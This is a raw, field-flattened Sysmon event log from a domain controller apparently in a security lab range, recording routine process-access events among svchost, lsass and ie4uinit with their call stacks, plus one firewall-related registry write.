13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010730Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010729Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010728Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010727Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010726Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.039{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.024{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000010714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.024{59A5CD1D-8E46-6005-0C00-00000000A301}5963184C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x800000000000000010713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-SetValue2021-01-18 13:58:21.992{59A5CD1D-8E46-6005-1500-00000000A301}1492C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\MpsSvc\Parameters\AppCs\AppCs\S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742S-1-5-21-2311372046-1276363322-545193238-500v2.26|AppPkgId=S-1-15-2-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|LUOwn=S-1-5-21-2311372046-1276363322-545193238-500|C=S-1-15-3-1|C=S-1-15-3-2|C=S-1-15-3-3|C=S-1-15-3-4|C=S-1-15-3-6|C=S-1-15-3-8|C=S-1-15-3-9|C=S-1-15-3-787448254-1207972858-3558633622-1059886964|C=S-1-15-3-3215430884-1339816292-89257616-1145831019|C=S-1-15-3-3071617654-1314403908-1117750160-3581451107|C=S-1-15-3-593192589-1214558892-284007604-3553228420|C=S-1-15-3-3870101518-1154309966-1696731070-4111764952|C=S-1-15-3-2105443330-1210154068-4021178019-2481794518|C=S-1-15-3-2345035983-1170044712-735049875-2883010875|C=S-1-15-3-3633849274-1266774400-1199443125-2736873758|C=S-1-15-3-2569730672-1095266119-53537203-1209375796|C=S-1-15-3-2569730672-1095266119-53537203-1209375796|C=S-1-15-3-2452736844-1257488215-2818397580-3305426111|C=S-1-15-3-1861897761-1695161497-2927542615-642690995-327840285-2659745135-2630312742|M=microsoft.windows.cortana_cw5n1h2txyewy|Name=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/PackageDisplayName}|Desc=@{Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy?ms-resource://Microsoft.Windows.Cortana/resources/ProductDescription}|D=C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\|PFN=Microsoft.Windows.Cortana_1.7.0.14393_neutral_neutral_cw5n1h2txyewy| 10341000x800000000000000010712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:21.992{59A5CD1D-93FB-6005-FE04-00000000A301}5108820C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011198Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.789{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.789{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.680{59A5CD1D-8E46-6005-1600-00000000A301}15444140C:\Windows\system32\svchost.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:23.680{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 